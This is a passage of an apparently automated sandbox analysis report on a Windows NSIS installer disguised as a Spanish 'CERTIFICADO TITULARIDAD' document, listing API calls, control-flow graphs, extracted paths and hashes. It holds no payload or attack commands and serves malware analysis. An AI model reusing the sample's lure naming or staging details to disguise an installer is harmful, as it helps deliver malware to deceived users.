                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                                                          • DestroyWindow.USER32 ref: 0040403C
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0040413A
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                                                          • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                                                          • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                                                          • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 121052019-0
                                                                                                                          • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                                                          • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                                                                                          • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                                                          • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 309 403bf3-403c0b call 406915 312 403c0d-403c1d call 406468 309->312 313 403c1f-403c56 call 4063ef 309->313 322 403c79-403ca2 call 403ec9 call 405ef8 312->322 318 403c58-403c69 call 4063ef 313->318 319 403c6e-403c74 lstrcatW 313->319 318->319 319->322 327 403d34-403d3c call 405ef8 322->327 328 403ca8-403cad 322->328 334 403d4a-403d6f LoadImageW 327->334 335 403d3e-403d45 call 40655e 327->335 328->327 329 403cb3-403ccd call 4063ef 328->329 333 403cd2-403cdb 329->333 333->327 336 403cdd-403ce1 333->336 338 403df0-403df8 call 40140b 334->338 339 403d71-403da1 RegisterClassW 334->339 335->334 340 403cf3-403cff lstrlenW 336->340 341 403ce3-403cf0 call 405e1d 336->341 352 403e02-403e0d call 403ec9 338->352 353 403dfa-403dfd 338->353 342 403da7-403deb SystemParametersInfoW CreateWindowExW 339->342 343 403ebf 339->343 347 403d01-403d0f lstrcmpiW 340->347 348 403d27-403d2f call 405df0 call 406521 340->348 341->340 342->338 346 403ec1-403ec8 343->346 347->348 351 403d11-403d1b GetFileAttributesW 347->351 348->327 355 403d21-403d22 call 405e3c 351->355 356 403d1d-403d1f 351->356 362 403e13-403e2d ShowWindow call 4068a5 352->362 363 403e96-403e97 call 405679 352->363 353->346 355->348 356->348 356->355 368 403e39-403e4b GetClassInfoW 362->368 369 403e2f-403e34 call 4068a5 362->369 367 403e9c-403e9e 363->367 370 403ea0-403ea6 367->370 371 403eb8-403eba call 40140b 367->371 375 403e63-403e86 DialogBoxParamW call 40140b 368->375 376 403e4d-403e5d GetClassInfoW RegisterClassW 368->376 369->368 370->353 372 403eac-403eb3 call 40140b 370->372 371->343 372->353 380 403e8b-403e94 call 403b43 375->380 376->375 380->346
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                            • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                          • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",00008001), ref: 00403C74
                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\subprovince,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76233420), ref: 00403CF4
                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\subprovince,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\subprovince), ref: 00403D5B
                                                                                                                            • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                                                          • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                                                          • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\subprovince$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                          • API String ID: 1975747703-2575251987
                                                                                                                          • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                                                          • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                                                                                          • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                                                          • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 397 403115-40312c 395->397 402 403205-403208 396->402 403 403258-40325d 396->403 400 403130-403139 call 40349e 397->400 401 40312e 397->401 409 40325f-403267 call 40301e 400->409 410 40313f-403146 400->410 401->400 405 40320a-403222 call 4034b4 call 40349e 402->405 406 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 402->406 403->388 405->403 429 403224-40322a 405->429 406->403 434 403269-40327a 406->434 409->403 413 4031c2-4031c6 410->413 414 403148-40315c call 405fcc 410->414 419 4031d0-4031d6 413->419 420 4031c8-4031cf call 40301e 413->420 414->419 432 40315e-403165 414->432 425 4031e5-4031ed 419->425 426 4031d8-4031e2 call 406a02 419->426 420->419 425->397 433 4031f3 425->433 426->425 429->403 429->406 432->419 438 403167-40316e 432->438 433->396 435 403282-403287 434->435 436 40327c 434->436 439 403288-40328e 435->439 436->435 438->419 440 403170-403177 438->440 439->439 441 403290-4032ab SetFilePointer call 405fcc 439->441 440->419 442 403179-403180 440->442 446 4032b0 441->446 442->419 444 403182-4031a2 442->444 444->403 445 4031a8-4031ac 444->445 447 4031b4-4031bc 445->447 448 4031ae-4031b2 445->448 446->388 447->419 449 4031be-4031c0 447->449 448->433 448->447 449->419
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,00000400), ref: 004030AF
                                                                                                                            • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,80000000,00000003), ref: 00406015
                                                                                                                            • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,80000000,00000003), ref: 004030FB
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                          • API String ID: 2803837635-2766950785
                                                                                                                          • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                          • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                                                          • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                          • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 450 40655e-406567 451 406569-406578 450->451 452 40657a-406594 450->452 451->452 453 4067a4-4067aa 452->453 454 40659a-4065a6 452->454 456 4067b0-4067bd 453->456 457 4065b8-4065c5 453->457 454->453 455 4065ac-4065b3 454->455 455->453 459 4067c9-4067cc 456->459 460 4067bf-4067c4 call 406521 456->460 457->456 458 4065cb-4065d4 457->458 461 406791 458->461 462 4065da-40661d 458->462 460->459 464 406793-40679d 461->464 465 40679f-4067a2 461->465 466 406623-40662f 462->466 467 406735-406739 462->467 464->453 465->453 468 406631 466->468 469 406639-40663b 466->469 470 40673b-406742 467->470 471 40676d-406771 467->471 468->469 476 406675-406678 469->476 477 40663d-40665b call 4063ef 469->477 474 406752-40675e call 406521 470->474 475 406744-406750 call 406468 470->475 472 406781-40678f lstrlenW 471->472 473 406773-40677c call 40655e 471->473 472->453 473->472 484 406763-406769 474->484 475->484 479 40667a-406686 GetSystemDirectoryW 476->479 480 40668b-40668e 476->480 489 406660-406663 477->489 485 406718-40671b 479->485 486 4066a0-4066a4 480->486 487 406690-40669c GetWindowsDirectoryW 480->487 484->472 492 40676b 484->492 491 40671d-406720 485->491 493 40672d-406733 call 4067cf 485->493 486->485 494 4066a6-4066c4 486->494 487->486 490 406669-406670 call 40655e 489->490 489->491 490->485 491->493 496 406722-406728 lstrcatW 491->496 492->493 493->472 498 4066c6-4066cc 494->498 499 4066d8-4066f0 call 406915 494->499 496->493 503 4066d4-4066d6 498->503 507 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 499->507 508 406707-406710 499->508 503->499 505 406712-406716 503->505 505->485 507->505 507->508 508->494 508->505
                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 4024019347-1661758443
                                                                                                                          • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                                                          • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                                                                                          • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                                                          • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 573 401774-401799 call 402dab call 405e67 578 4017a3-4017b5 call 406521 call 405df0 lstrcatW 573->578 579 40179b-4017a1 call 406521 573->579 584 4017ba-4017bb call 4067cf 578->584 579->584 588 4017c0-4017c4 584->588 589 4017c6-4017d0 call 40687e 588->589 590 4017f7-4017fa 588->590 597 4017e2-4017f4 589->597 598 4017d2-4017e0 CompareFileTime 589->598 592 401802-40181e call 406011 590->592 593 4017fc-4017fd call 405fec 590->593 600 401820-401823 592->600 601 401892-4018bb call 4055a6 call 4032b9 592->601 593->592 597->590 598->597 603 401874-40187e call 4055a6 600->603 604 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 600->604 615 4018c3-4018cf SetFileTime 601->615 616 4018bd-4018c1 601->616 613 401887-40188d 603->613 604->588 637 401869-40186a 604->637 617 402c38 613->617 619 4018d5-4018e0 CloseHandle 615->619 616->615 616->619 621 402c3a-402c3e 617->621 622 4018e6-4018e9 619->622 623 402c2f-402c32 619->623 625 4018eb-4018fc call 40655e lstrcatW 622->625 626 4018fe-401901 call 40655e 622->626 623->617 630 401906-40239d 625->630 626->630 635 4023a2-4023a7 630->635 636 40239d call 405b81 630->636 635->621 636->635 637->613 638 40186c-40186d 637->638 638->603
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\subprovince,?,?,00000031), ref: 004017B5
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\subprovince,?,?,00000031), ref: 004017DA
                                                                                                                            • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                            • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                            • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll), ref: 00405613
                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nspD212.tmp$C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll$C:\Users\user\subprovince$Call
                                                                                                                          • API String ID: 1941528284-1592409766
                                                                                                                          • Opcode ID: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
                                                                                                                          • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                                                                                          • Opcode Fuzzy Hash: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
                                                                                                                          • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 639 4055a6-4055bb 640 4055c1-4055d2 639->640 641 405672-405676 639->641 642 4055d4-4055d8 call 40655e 640->642 643 4055dd-4055e9 lstrlenW 640->643 642->643 645 405606-40560a 643->645 646 4055eb-4055fb lstrlenW 643->646 648 405619-40561d 645->648 649 40560c-405613 SetWindowTextW 645->649 646->641 647 4055fd-405601 lstrcatW 646->647 647->645 650 405663-405665 648->650 651 40561f-405661 SendMessageW * 3 648->651 649->648 650->641 652 405667-40566a 650->652 651->650 652->641
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                          • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll), ref: 00405613
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
